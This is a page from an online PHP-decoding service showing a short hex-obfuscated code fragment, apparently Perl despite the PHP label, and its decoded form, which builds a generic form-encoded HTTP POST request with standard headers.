Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$h->header("\x41\x63\x63\x65\x70\x74" => "\x2A\x2F\x2A", "\x41\x63\x63\x65..

Decoded Output download

<?                  $h->header("Accept" => "*/*", "Accept-Language" => "pt-br", "Connection" => "Close", "Pragma" => "no-cache"); 
        my $request             = HTTP::Request->new(POST => $url,$h); 
                $request->content_type("application/x-www-form-urlencoded"); 
                $request->content($_[1]); ?>

Did this file decode correctly?

Original Code

                $h->header("\x41\x63\x63\x65\x70\x74" => "\x2A\x2F\x2A", "\x41\x63\x63\x65\x70\x74\x2D\x4C\x61\x6E\x67\x75\x61\x67\x65" => "\x70\x74\x2D\x62\x72", "\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E" => "\x43\x6C\x6F\x73\x65", "\x50\x72\x61\x67\x6D\x61" => "\x6E\x6F\x2D\x63\x61\x63\x68\x65");
        my $request             = HTTP::Request->new(POST => $url,$h);
                $request->content_type("\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64");
                $request->content($_[1]);

Function Calls

None

Variables

None

Stats

MD5 3019505449a6be37cd452f3eba8e566b
Eval Count 0
Decode Time 240 ms